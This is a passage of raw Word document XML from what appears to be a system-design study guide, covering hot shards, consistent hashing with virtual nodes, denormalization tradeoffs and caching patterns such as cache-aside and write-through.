    <w:p w14:paraId="4D09253E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A viral celebrity's shard gets 100x the traffic of others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E6A099" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A popular product's shard is hammered during a flash sale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AC0F10" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA877F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Split hot shards further.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBCCCD5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Add read replicas specifically for hot shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290ADBFA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Application-level caching for hot keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A5BC12" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Shard-level rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112CC580" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Consistent Hashing — Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA1737F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem it solves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D8D196" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>With simple hash(key) % N, adding one server moves ~(N-1)/N of all keys. For 100 servers, ~99% of data must move. Unacceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED4A79" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How consistent hashing works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4EDBC5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The hash ring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Imagine a circular number space from 0 to 2^32 - 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F521047" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Place servers on the ring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Hash each server's identifier (e.g., IP address) to get its position on the ring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A472312" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Place keys on the ring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Hash each data key to get its position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76195AFA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Assignment rule:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Each key is assigned to the first server encountered going clockwise on the ring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C4292C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When a server is added:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116C5CAC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Only keys between the new server and its counter-clockwise neighbor need to move.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052BE43E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>On average, only 1/N of keys are redistributed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDFC303" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When a server is removed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46493589" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Its keys move to the next clockwise server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0197B4E5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Only that server's keys are affected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34036CCA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The non-uniform distribution problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027152AF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>With few servers, they may cluster on the ring, causing uneven load. Server A might own 60% of the ring, Server B only 10%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507DC59F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Virtual nodes solve this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0413563F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Each physical server gets K virtual positions on the ring (e.g., K=150).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E069C7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Server A is placed at hash("A-1"), hash("A-2"), ..., hash("A-150").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6046EEA7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>With many points per server, the distribution becomes statistically uniform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3E6425" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>When a server is removed, its load is spread across many other servers (not just one).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2094B35D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-world usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B1BB0D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Amazon DynamoDB's internal partitioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5461810B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Apache Cassandra's token ring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA059FD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Memcached client-side consistent hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A91455" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Content Delivery Networks (CDN) for cache distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7DB70E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 Database Denormalization for Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E45413" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Normalized databases require JOINs. JOINs across shards are expensive/impossible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7A3B62" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How denormalization helps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054520AE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Instead of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48037346" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>orders table with user_id foreign key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476A29E2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>users table with user details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED59AB1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>JOIN required to show "order + user name"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C5F19" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Denormalized:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F94A60" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>orders table includes user_name directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A72E4E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>No JOIN needed. Query hits one shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A80940" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The tradeoffs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0777CED2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write amplification:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> When a user changes their name, you must update it in EVERY order record. Potentially millions of writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A45F75A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Storage increase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Duplicate data consumes more space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092EFFDB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistency risk:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> If the update to denormalized copies fails midway, data becomes inconsistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1A24F6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>When it's worth it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6508D83E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>When the read:write ratio is heavily skewed toward reads (common — most systems are 90%+ reads). The write amplification is acceptable because it happens rarely, and read performance is critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5CAB80" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="479D4386">
          <v:rect id="_x0000_i2290" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C1355" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Caching for Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE88CE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Cache as a Scalability Multiplier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24033A61" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental insight:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE3522A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>If 80% of queries hit 20% of data (Pareto distribution, which is very common), caching that 20% eliminates 80% of database load. Your database effectively serves 5x more users without any database scaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD3CE33" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Caching Patterns — How They Work Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719A7C86" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache-Aside (Lazy Loading):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA82693" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Application checks cache for key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DCC606" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Cache miss → Application queries database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A587E1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Application writes result to cache (with TTL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545AA950" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Returns result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351E5574" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>On subsequent requests: Cache hit → return directly (no database query).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C1127D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internals of a cache hit (Redis):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EF2CF5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Client sends GET command over TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169CB442" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Redis looks up key in its hash table (O(1)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BC0831" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>If found and not expired → returns value. Total time: &lt; 1ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C930CD5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>If found but expired → deletes key, returns nil (miss).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005FF05E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Only caches data that's actually requested. No wasted memory on unused data. </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> First request always hits database (cold start). Three round-trips on miss (check cache, query DB, write cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B950755" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-Through Cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F474922" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Application writes to cache AND database together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCD6BF4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Cache is always up-to-date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB337DF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597343BF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
